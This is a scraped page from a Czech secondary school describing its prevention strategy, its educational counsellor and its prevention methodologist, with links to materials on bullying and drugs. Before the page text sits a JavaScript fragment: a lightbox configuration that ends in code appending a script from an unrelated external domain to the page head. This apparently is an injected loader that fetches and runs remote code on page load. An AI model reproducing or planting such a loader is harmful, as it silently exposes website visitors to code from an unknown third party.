, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

Preventivní strategie SŠE

Na škole působí výchovný poradce Mgr. Jana Skulinová a školní metodik prevence sociálně patologických jevů Mgr. Olga Výtisková.

Na realizaci preventivní strategie školy se podílejí všichni zaměstnanci školy.
Výchovný poradce poskytuje poradenství při osobních, studijních a výchovných problémech souvisejících se školou.
Školní metodik prevence napomáhá v řešení těchto problémů a také vyhledává vhodné nástroje k jejich předcházení, které implementuje do výuky s ostatními pedagogy.

Dokument školní preventivní strategie najdete zde.

Informační materiál pro rodiče na téma šikana a drogy naleznete zde.

Plán práce výchovného poradce je zde.